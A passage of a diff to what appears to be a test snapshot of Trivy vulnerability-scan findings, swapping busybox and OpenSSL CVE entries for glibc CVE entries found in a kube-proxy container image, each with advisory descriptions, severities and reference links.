"CVE-2020-27618", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42374", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42374", + "https://access.redhat.com/security/cve/CVE-2020-27618", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", + "https://linux.oracle.com/cve/CVE-2020-27618.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210401-0006/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2020-27618", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", ], }, "category": "Vulnerability", - "description": "An out-of-bounds heap read in Busybox's unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed. This can be triggered by any applet/format that", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The iconv function in the GNU C Library (aka glibc or libc6) 2.32 and earlier, when processing invalid multi-byte input sequences in IBM1364, IBM1371, IBM1388, IBM1390, and IBM1399 encodings, fails to advance the input state, which could lead to an infinite loop in applications, resulting in a denial of service, a different vulnerability from CVE-2016-10228.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: out-of-bounds read in unlzma applet leads to information leak and denial of service when crafted LZMA-compressed input is decompressed", + "name": "glibc: iconv when processing invalid multi-byte input sequences fails to advance the input state, which could result in an infinite loop", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42374", + "value": "https://avd.aquasec.com/nvd/cve-2020-27618", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42374", + "value": "https://access.redhat.com/security/cve/CVE-2020-27618", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27618", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42374", + "value": "https://linux.oracle.com/cve/CVE-2020-27618.html", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-27618", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42374", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.netapp.com/advisory/ntap-20210401-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42374", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5310-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5768-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-27618", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1l-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", ], }, "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", + ], + }, + "category": "Vulnerability", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "value": "https://avd.aquasec.com/nvd/cve-2018-20796", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "value": "http://www.securityfocus.com/bid/107160", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://access.redhat.com/security/cve/CVE-2018-20796", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010022", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010022", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "https://ubuntu.com/security/CVE-2019-1010022", + "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: stack guard protection bypass", + "references": [ + { + "type": "URL", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://ubuntu.com/security/CVE-2019-1010022", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23840", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010023", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23840", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", - "https://github.com/advisories/GHSA-qgm6-9472-pwq7", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", - "https://linux.oracle.com/cve/CVE-2021-23840.html", - "https://linux.oracle.com/errata/ELSA-2021-9561.html", - "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", - "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", - "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://ubuntu.com/security/notices/USN-4738-1", - "https://ubuntu.com/security/notices/USN-5088-1", - "https://www.cve.org/CVERecord?id=CVE-2021-23840", - "https://www.debian.org/security/2021/dsa-4855", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-03", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", + "http://www.securityfocus.com/bid/109167", + "https://access.redhat.com/security/cve/CVE-2019-1010023", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010023", + "https://www.cve.org/CVERecord?id=CVE-2019-1010023", ], }, "category": "Vulnerability", - "description": "Calls to EVP_CipherUpdate, EVP_EncryptUpdate and EVP_DecryptUpdate may overflow the output length argument in some cases where the input length is close to the maximum permissable length for an integer on the platform. In such cases the return value from the function call will be 1 (indicating success), but the output length value will be negative. This could cause applications to behave incorrectly or crash. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: integer overflow in CipherUpdate", + "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23840", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23840", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23840", + "value": "http://www.securityfocus.com/bid/109167", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-qgm6-9472-pwq7", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10366", + "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-23840.html", + "value": "https://ubuntu.com/security/CVE-2019-1010023", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010024", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "http://www.securityfocus.com/bid/109162", + "https://access.redhat.com/security/cve/CVE-2019-1010024", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010024", + "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: ASLR bypass using cache of thread stack and heap", + "references": [ { "type": "URL", - "value": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b@%3Cissues.bookkeeper.apache.org%3E", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4@%3Cissues.bookkeeper.apache.org%3E", + "value": "http://www.securityfocus.com/bid/109162", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23840", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0057.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4738-1", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5088-1", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23840", + "value": "https://ubuntu.com/security/CVE-2019-1010024", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4855", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1010025", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-1010025", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "https://support.f5.com/csp/article/K06046097", + "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "https://ubuntu.com/security/CVE-2019-1010025", + "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "references": [ { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://support.f5.com/csp/article/K06046097", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-03", + "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://ubuntu.com/security/CVE-2019-1010025", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1k-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-3450", - "installedVersion": "1.1.1g-r0", - "packageName": "libcrypto1.1", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19126", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "http://www.openwall.com/lists/oss-security/2021/03/27/1", - "http://www.openwall.com/lists/oss-security/2021/03/27/2", - "http://www.openwall.com/lists/oss-security/2021/03/28/3", - "http://www.openwall.com/lists/oss-security/2021/03/28/4", - "https://access.redhat.com/security/cve/CVE-2021-3450", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2a40b7bc7b94dd7de897a74571e7024f0cf0d63b", - "https://github.com/advisories/GHSA-8hfj-xrj2-pm22", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", - "https://linux.oracle.com/cve/CVE-2021-3450.html", - "https://linux.oracle.com/errata/ELSA-2021-9151.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", - "https://mta.openssl.org/pipermail/openssl-announce/2021-March/000198.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3450", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", - "https://rustsec.org/advisories/RUSTSEC-2021-0056.html", - "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", - "https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://www.cve.org/CVERecord?id=CVE-2021-3450", - "https://www.openssl.org/news/secadv/20210325.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-08", - "https://www.tenable.com/security/tns-2021-09", + "https://access.redhat.com/security/cve/CVE-2019-19126", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19126", + "https://linux.oracle.com/cve/CVE-2019-19126.html", + "https://linux.oracle.com/errata/ELSA-2020-3861.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + 